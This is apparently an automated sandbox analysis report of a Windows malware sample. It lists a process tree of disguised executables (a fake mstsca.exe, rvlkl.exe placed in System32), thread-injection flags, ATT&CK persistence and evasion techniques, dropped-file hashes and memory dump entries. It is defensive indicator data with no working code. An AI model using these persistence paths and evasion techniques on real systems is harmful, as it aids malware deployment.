C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 46916 -ip 469161⤵
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Bootkit
1Scheduled Task
1Defense Evasion
Virtualization/Sandbox Evasion
2File Permissions Modification
1Modify Registry
3Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\rvlkl\confFilesize
811B
MD50fc82ada466dba64d891f0864acc78af
SHA11b6a5606be5e718766c85206001aa84da1c1ad26
SHA2569ce903a72b112d4a6ddd5b09cebefe64228dc4b8f690f9f977937081bc5f596d
SHA5123b01757e94b415fa6b61b803a274681f47cca97bc183026e224a594e8d50fca92bbbb59e7dd3c7029d6e9c46ab48d00148ac50a0992450cf77626a63d8091554
-
C:\ProgramData\rvlkl\log.cssFilesize
938B
MD5a35bd6e012b609d94a076699c5372657
SHA1f1ca92f37ccb1c21078d79b465a1cfe5c8e6d9c6
SHA2566ef8cfc8307115a02e5b60af549867dc79bdf3018eb95a9417e8e6c3632eabb5
SHA512c048a0cbac75db0f72972989503e8f1ce0cb2b84f97e1223e4050f42095faefad06802117690aeec20c10951fdb5603201ab8aa4010b507bc8d5ef7ff7d960ba
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exeFilesize
967KB
MD5521f2a5c686f718e3ca2dca5f4af2b49
SHA10d26e7d1541dff2e922b18c3ed5556f9f05e85d5
SHA2567444dc7f026376291df6bc0ba8a1ef4a97b22b7efa1ff446e8b7ee83814f0533
SHA51244fc79ad4c8ffe2197aeb3ea28fcd15412f707108e8b8b576b35fe38f9e8626f23b3983a9713ea161a4397c25d0329d1b0113417706500ee565e029dd3b31bd7
-
C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exeFilesize
967KB
MD5521f2a5c686f718e3ca2dca5f4af2b49
SHA10d26e7d1541dff2e922b18c3ed5556f9f05e85d5
SHA2567444dc7f026376291df6bc0ba8a1ef4a97b22b7efa1ff446e8b7ee83814f0533
SHA51244fc79ad4c8ffe2197aeb3ea28fcd15412f707108e8b8b576b35fe38f9e8626f23b3983a9713ea161a4397c25d0329d1b0113417706500ee565e029dd3b31bd7
-
C:\Windows\System32\rvlkl.exeFilesize
655KB
MD5a96ec3a8236736c4153d8cc16c53dca3
SHA1a2465dcf8ed6de45f8d67839c5105d08d94b9d7e
SHA2562c4147281974ce872b59bc994c378561af209da70875b60d8d213e563e605b87
SHA51239dafd41230958bd4fdeede772fee60297fc0f369e1c5f41bdad6854ea6a210a10d36a67a15ab6270d67f2bb1978b4de135edbe4d4779f9fcc51ff691b141270
-
C:\Windows\System32\rvlkl.exeFilesize
655KB
MD5a96ec3a8236736c4153d8cc16c53dca3
SHA1a2465dcf8ed6de45f8d67839c5105d08d94b9d7e
SHA2562c4147281974ce872b59bc994c378561af209da70875b60d8d213e563e605b87
SHA51239dafd41230958bd4fdeede772fee60297fc0f369e1c5f41bdad6854ea6a210a10d36a67a15ab6270d67f2bb1978b4de135edbe4d4779f9fcc51ff691b141270
-
C:\Windows\system32\rvlkl.exeFilesize
655KB
MD5a96ec3a8236736c4153d8cc16c53dca3
SHA1a2465dcf8ed6de45f8d67839c5105d08d94b9d7e
SHA2562c4147281974ce872b59bc994c378561af209da70875b60d8d213e563e605b87
SHA51239dafd41230958bd4fdeede772fee60297fc0f369e1c5f41bdad6854ea6a210a10d36a67a15ab6270d67f2bb1978b4de135edbe4d4779f9fcc51ff691b141270
-
\??\pipe\crashpad_5068_XDHTDKHIVZWOQZWHMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/744-266-0x0000000000000000-mapping.dmp
-
memory/744-277-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB
-
memory/1012-165-0x0000000007420000-0x000000000794C000-memory.dmpFilesize
5.2MB
-
memory/1012-156-0x0000000005DF0000-0x0000000005EFA000-memory.dmpFilesize
1.0MB
-
memory/1012-148-0x0000000000000000-mapping.dmp
-
memory/1012-149-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/1012-151-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/1012-152-0x0000000005160000-0x0000000005704000-memory.dmpFilesize
5.6MB
-
memory/1012-153-0x00000000050A0000-0x0000000005132000-memory.dmpFilesize
584KB
-
memory/1012-173-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/1012-155-0x0000000005740000-0x0000000005D58000-memory.dmpFilesize
6.1MB
-
memory/1012-167-0x0000000007AE0000-0x0000000007B56000-memory.dmpFilesize
472KB
-
memory/1012-157-0x0000000005F20000-0x0000000005F32000-memory.dmpFilesize
72KB
-
memory/1012-158-0x0000000005F40000-0x0000000005F7C000-memory.dmpFilesize
240KB
-
memory/1012-166-0x0000000007A50000-0x0000000007AA0000-memory.dmpFilesize
320KB
-
memory/1012-164-0x0000000007230000-0x00000000073F2000-memory.dmpFilesize
1.8MB
-
memory/1012-163-0x0000000006D60000-0x0000000006DC6000-memory.dmpFilesize
408KB
-
memory/1732-301-0x0000000000000000-mapping.dmp
-
memory/1732-319-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/1944-209-0x0000000140000000-0x0000000140604000-memory.dmpFilesize
6.0MB
-
memory/1944-178-0x0000000000000000-mapping.dmp
-
memory/2068-328-0x0000000000000000-mapping.dmp
-
memory/2068-336-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/2204-236-0x0000000000B90000-0x0000000000BC2000-memory.dmpFilesize
200KB
-
memory/2204-227-0x0000000000B90000-0x0000000000BC2000-memory.dmpFilesize
200KB
-
memory/2204-215-0x0000000000B90000-0x0000000000BC2000-memory.dmpFilesize
200KB
-
memory/2204-207-0x0000000000000000-mapping.dmp
-
memory/2204-235-0x0000000000B90000-0x0000000000BC2000-memory.dmpFilesize
200KB
-
memory/2216-1070-0x0000000000000000-mapping.dmp
-
memory/2220-347-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/2220-180-0x0000000000000000-mapping.dmp
-
memory/2220-357-0x00000000009DA000-0x00000000009EB000-memory.dmpFilesize
68KB
-
memory/2220-360-0x0000000000400000-0x00000000007E8000-memory.dmpFilesize
3.9MB
-
memory/2400-177-0x0000000000000000-mapping.dmp
-
memory/2400-325-0x0000000002320000-0x000000000243B000-memory.dmpFilesize
1.1MB
-
memory/2400-323-0x0000000000A4F000-0x0000000000AE1000-memory.dmpFilesize
584KB
-
memory/2412-196-0x0000000000A70000-0x0000000000AD0000-memory.dmpFilesize
384KB
-
memory/2412-185-0x0000000000000000-mapping.dmp
-
memory/2612-176-0x0000000000000000-mapping.dmp
-
memory/2612-191-0x00000000002C0000-0x0000000000306000-memory.dmpFilesize
280KB
-
memory/2784-268-0x0000000006050000-0x000000000618F000-memory.dmpFilesize
1.2MB
-
memory/2784-279-0x0000000006058000-0x0000000006068000-memory.dmpFilesize
64KB
-
memory/2784-271-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmpFilesize
2.0MB
-
memory/2784-247-0x0000000000E30000-0x0000000000E38000-memory.dmpFilesize
32KB
-
memory/2784-238-0x0000000000000000-mapping.dmp
-
memory/2928-311-0x0000000000000000-mapping.dmp
-
memory/3128-184-0x0000000000000000-mapping.dmp
-
memory/3128-198-0x0000000000400000-0x00000000008FF000-memory.dmpFilesize
5.0MB
-
memory/3128-228-0x0000000000400000-0x00000000008FF000-memory.dmpFilesize
5.0MB
-
memory/3264-174-0x0000000000000000-mapping.dmp
-
memory/3488-321-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/3488-302-0x0000000000000000-mapping.dmp
-
memory/3492-230-0x0000000000400000-0x00000000008E5000-memory.dmpFilesize
4.9MB
-
memory/3492-205-0x0000000000400000-0x00000000008E5000-memory.dmpFilesize
4.9MB
-
memory/3492-183-0x0000000000000000-mapping.dmp
-
memory/3548-179-0x0000000000000000-mapping.dmp
-
memory/3568-239-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/3568-330-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/3608-206-0x00000000006A0000-0x0000000000D66000-memory.dmpFilesize
6.8MB
-
memory/3608-175-0x0000000000000000-mapping.dmp
-
memory/3608-317-0x0000000005D30000-0x0000000005DCC000-memory.dmpFilesize
624KB
-
memory/3720-181-0x0000000000000000-mapping.dmp
-
memory/3772-276-0x0000000000400000-0x0000000000446000-memory.dmpFilesize
280KB
-
memory/3772-278-0x0000000000400000-0x0000000000446000-memory.dmpFilesize
280KB
-
memory/3772-274-0x0000000000400000-0x0000000000446000-memory.dmpFilesize
280KB
-
memory/3772-272-0x0000000000000000-mapping.dmp
-
memory/3772-356-0x0000000000400000-0x0000000000446000-memory.dmpFilesize
280KB
-
memory/3772-284-0x0000000000400000-0x0000000000446000-memory.dmpFilesize
280KB
-
memory/3836-335-0x0000000002856000-0x00000000029A0000-memory.dmpFilesize
1.3MB
-
memory/3836-260-0x0000000002313000-0x0000000002847000-memory.dmpFilesize
5.2MB
-
memory/3836-182-0x0000000000000000-mapping.dmp
-
memory/3956-190-0x0000000000000000-mapping.dmp
-
memory/3956-240-0x0000000000400000-0x00000000004FC000-memory.dmpFilesize
1008KB
-
memory/3956-204-0x0000000000400000-0x00000000004FC000-memory.dmpFilesize
1008KB
-
memory/3956-197-0x0000000000400000-0x00000000004FC000-memory.dmpFilesize
1008KB
-
memory/4028-193-0x0000000000000000-mapping.dmp
-
memory/4028-203-0x00000000009D0000-0x00000000009F8000-memory.dmpFilesize
160KB
-
memory/4180-295-0x0000000000000000-mapping.dmp
-
memory/4196-171-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/4196-162-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/4196-159-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/4196-220-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/4244-281-0x0000000000000000-mapping.dmp
-
memory/4288-194-0x0000000000000000-mapping.dmp
-
memory/4288-275-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/4288-212-0x0000000000400000-0x000000000088C000-memory.dmpFilesize
4.5MB
-
memory/4324-188-0x0000000000000000-mapping.dmp
-
memory/4364-1071-0x0000000000000000-mapping.dmp
-
memory/4784-237-0x000000000060C000-0x0000000000616000-memory.dmpFilesize
40KB
-
memory/4784-309-0x000000000060C000-0x0000000000616000-memory.dmpFilesize
40KB
-
memory/4784-234-0x0000000000000000-mapping.dmp
-
memory/4944-290-0x00007FFC64A10000-0x00007FFC654D1000-memory.dmpFilesize
10.8MB
-
memory/4944-283-0x0000000000000000-mapping.dmp
-
memory/4944-144-0x00000000006B0000-0x0000000001172000-memory.dmpFilesize
10.8MB
-
memory/4944-288-0x00000184A12A0000-0x00000184A12A6000-memory.dmpFilesize
24KB
-
memory/4944-147-0x00000000006B0000-0x0000000001172000-memory.dmpFilesize
10.8MB
-
memory/4944-154-0x00000000006B0000-0x0000000001172000-memory.dmpFilesize
10.8MB
-
memory/5092-243-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5092-327-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5228-136-0x0000000000000000-mapping.dmp
-
memory/5292-187-0x0000000000000000-mapping.dmp
-
memory/5316-189-0x0000000000000000-mapping.dmp
-
memory/5508-186-0x0000000000000000-mapping.dmp
-
memory/5508-265-0x0000000000400000-0x00000000008E3000-memory.dmpFilesize
4.9MB
-
memory/5508-200-0x0000000000400000-0x00000000008E3000-memory.dmpFilesize
4.9MB
-
memory/5564-299-0x0000000000F70000-0x0000000000F79000-memory.dmpFilesize
36KB
-
memory/5564-282-0x0000000000000000-mapping.dmp
-
memory/5564-285-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmpFilesize
2.0MB
-
memory/5632-326-0x0000000000000000-mapping.dmp
-
memory/5632-345-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/5840-168-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5840-172-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5840-219-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5840-195-0x0000000000450000-0x0000000000F12000-memory.dmpFilesize
10.8MB
-
memory/5900-214-0x0000000000000000-mapping.dmp
-
memory/5988-273-0x0000000000400000-0x000000000089E000-memory.dmpFilesize
4.6MB
-
memory/5988-218-0x0000000000400000-0x000000000089E000-memory.dmpFilesize
4.6MB
-
memory/5988-192-0x0000000000000000-mapping.dmp
-
memory/6028-133-0x0000000000000000-mapping.dmp
-
memory/6260-353-0x0000000000000000-mapping.dmp
-
memory/6496-367-0x0000000000000000-mapping.dmp
-
memory/6664-383-0x0000000000000000-mapping.dmp
-
memory/6728-389-0x0000000000000000-mapping.dmp
-
memory/6944-409-0x0000000000000000-mapping.dmp
-
memory/7100-420-0x0000000000000000-mapping.dmp
-
memory/8276-545-0x0000000000000000-mapping.dmp
-
memory/8360-550-0x0000000000000000-mapping.dmp
-
memory/8820-588-0x0000000000000000-mapping.dmp
-
memory/10780-1068-0x0000000000000000-mapping.dmp
-
memory/10800-1069-0x0000000000000000-mapping.dmp
-
memory/11148-1058-0x0000000000000000-mapping.dmp
-
memory/11168-1060-0x0000000000000000-mapping.dmp
-
memory/11256-1066-0x0000000000000000-mapping.dmp
-
memory/12632-233-0x0000000000000000-mapping.dmp
-
memory/12868-232-0x0000000000000000-mapping.dmp
-
memory/40852-250-0x0000000000070000-0x00000000000A7000-memory.dmpFilesize
220KB
-
memory/40852-249-0x0000000000000000-mapping.dmp
-
memory/44000-248-0x0000000000000000-mapping.dmp
-
memory/47800-292-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-294-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-269-0x0000000000000000-mapping.dmp
-
memory/47800-270-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-287-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/50772-262-0x0000000000000000-mapping.dmp
-
memory/50772-263-0x00000000013A0000-0x00000000013BC000-memory.dmpFilesize
112KB
-
memory/50772-316-0x0000000006810000-0x000000000682E000-memory.dmpFilesize
120KB
-
memory/50840-264-0x0000000000000000-mapping.dmp
-
memory/50840-267-0x00000000007E0000-0x0000000000841000-memory.dmpFilesize
388KB
-
memory/50916-251-0x0000000000000000-mapping.dmp
-
memory/50916-252-0x0000000000400000-0x0000000000460000-memory.dmpFilesize
384KB
-
memory/50956-253-0x0000000000000000-mapping.dmp
-
memory/50956-255-0x00000000007D0000-0x00000000007F8000-memory.dmpFilesize
160KB
-
memory/51104-261-0x00000000007C0000-0x00000000007E9000-memory.dmpFilesize
164KB
-
memory/51104-258-0x0000000000000000-mapping.dmp